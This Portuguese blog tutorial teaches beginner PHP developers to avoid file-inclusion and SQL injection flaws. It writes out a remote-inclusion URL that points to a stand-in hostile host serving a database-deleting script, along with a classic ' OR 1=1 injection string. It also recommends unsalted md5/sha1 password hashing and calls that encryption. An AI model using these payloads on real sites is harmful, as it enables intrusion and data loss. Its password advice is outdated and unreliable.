leitura de
Encontrou um problema no conteúdo? Por favor, deixe seu comentário!

Hoje vou falar sobre alguns erros comuns que são cometidos por programadores que estão começando agora. Resolvi fazer esse post pois vejo diariamente em fóruns de PHP pessoas com erros em scripts que possuem rombos enormes de segurança…

Não prometo deixar o seu sistema tão protegido quanto o [](/arquivos/2009/03/cadillac-one.jpg) mas, sem dúvida, você vai evitar que muita gente faça um estrago considerável no seu site.

Se você se identificar com algumas dessas medidas não saia correndo e se jogue da ponte… Faça os devidos ajustes e tudo ficará bem.

Cuidados com a URL - Parte I

Uma falha muito comum são aqueles sites que, tentando usar um sistema “legal”, acabam abusando da sorte… São sites que incluem o conteúdo (via include()) baseado em uma variável do método $_GET. Exemplo:

E na URL do site ficaria: http://www.meusite.com.br/?pagina=contato.php

Com isso o “invasor” pode, por exemplo, colocar um caminho de um script externo no lugar da variável: http://www.meusite.com.br/?pagina=http://sitedumal.net/deleta-banco.php

O seu site incluiria o arquivo normalmente e executaria tudo que existe dentro dele… O resto você já pode imaginar.

Evitar que isso aconteça é extremamente simples: é só criar um array contendo os nomes dos arquivos que poderão ser incluídos, dessa forma:

Viu? Adicionamos uma única linha e mais uma condição e está tudo resolvido. Com isso, se o atacante colocar lá o site dele na URL do seu site o PHP vai identificar que a variável $_GET[‘pagina’] existe mas não está no array $permitidos, então ele vai incluir o arquivo home.php.

Cuidados com a URL - Parte II

Outro erro comum é quando passamos parâmetros pela URL, por exemplo: o ID de uma categoria ou de um produto que, mais tarde, será buscado direto no banco para recolher algumas informações.

Geralmente o formato é o seguinte: http://www.meusite.com.br/produtos.php?id=12 ou http://www.meusite.com.br/?pagina=produtos.php&id=12

Com isso (se você não se preparar) você deixa uma porta aberta para um ataque famoso chamado SQL-Injection que nada mais é do que a inserção de um código SQL em um campo de texto ou parâmetro da URL que será enviado diretamente para o banco. Vamos a um exemplo:

A sua consulta ao MySQL ficaria da seguinte forma:

Até aqui tudo bem.. Seu script funciona, você tem o que precisa e tá tudo na mais perfeita harmonia… Mas chega um desocupado invasor e modifica a sua URL deixando da seguinte forma:

http://www.meusite.com.br/produtos.php?id=’ OR 1=1 OR ‘’=’

Agora a sua query MySQL fica assim:

Viu o que aconteceu? As possíveis condições para a consulta ser verdadeira são: id igual a vazio, 1 igual a 1 e vazio igual a vazio… Essa consulta vai ser dada como verdadeira e todos os produtos serão retornados. Sim meu amigo, é o fim do mundo.

Mas, como eu disse, não estou aqui para te assustar e sim para mostrar como resolver o pepino… Vamos a uma atitude simples mas que te salvará do Apocalipse… É só mudar uma linha:

Com isso eu digo que valor da variável $produto será igual ao valor inteiro (int de integer) da variável $_GET[‘id’]. Problema resolvido meus caros!

Se o atacante colocar uma string como parâmetro (todo SQL-Injection é uma string) ela será convertida para inteiro… E o valor inteiro de uma string é igual a zero. 8-)

Peço atenção dobrada para o entendimento desse último exemplo pois o SQL-Injection é o ataque mais comum dos últimos tempos.

Caso você passe parâmetros via URL que são strings e não números inteiros, você pode usar a função mysql_real_escape_string() da seguinte forma:

Com isso você evita o uso de aspas e caracteres protegidos do MySQL mantendo a sua query segura. Esse caso também vale para formulários dos quais os dados vão direto para consultas MySQL (formulários de login, cadastro e comentários, por exemplo).

Sobre Usuários e Senhas

Outro ponto muito importante é não exibir, em momento algum, o nome de login (usuário) de algum usuário cadastrado no sistema. Lembre-se que para um usuário conseguir invadir a conta do outro ele precisa de duas coisas: usuário (ou e-mail) e a senha.. Se ele souber o usuário já tem 50% de sucesso.

Vale lembrar também que você não precisa deixar a senha do usuário na forma real quando salva-la no banco. É muito mais seguro salvar um md5() ou sha1() da senha no banco e quando for necessário fazer a validação do usuário você também gera o md5() ou sha1() da senha que ele digitou e compara com o que há no banco. Assim, se por ventura alguém conseguir invadir e pegar todos os registros do banco de usuários, o máximo que ele irá conseguir são o usuário/e-mail e uma senha criptografada.

Se quiser saber como funciona criptografica no PHP é só ver esse post:» Criptografia no PHP usando md5, sha1 e base64

Espero que tenham gostado. :)

Thiago Belem / Blog

Thiago Belem


Publicado

Thiago Belem / Blog

Thiago Belem / Blog

Artigos e tutoriais sobre desenvolvimento WEB

Continue lendo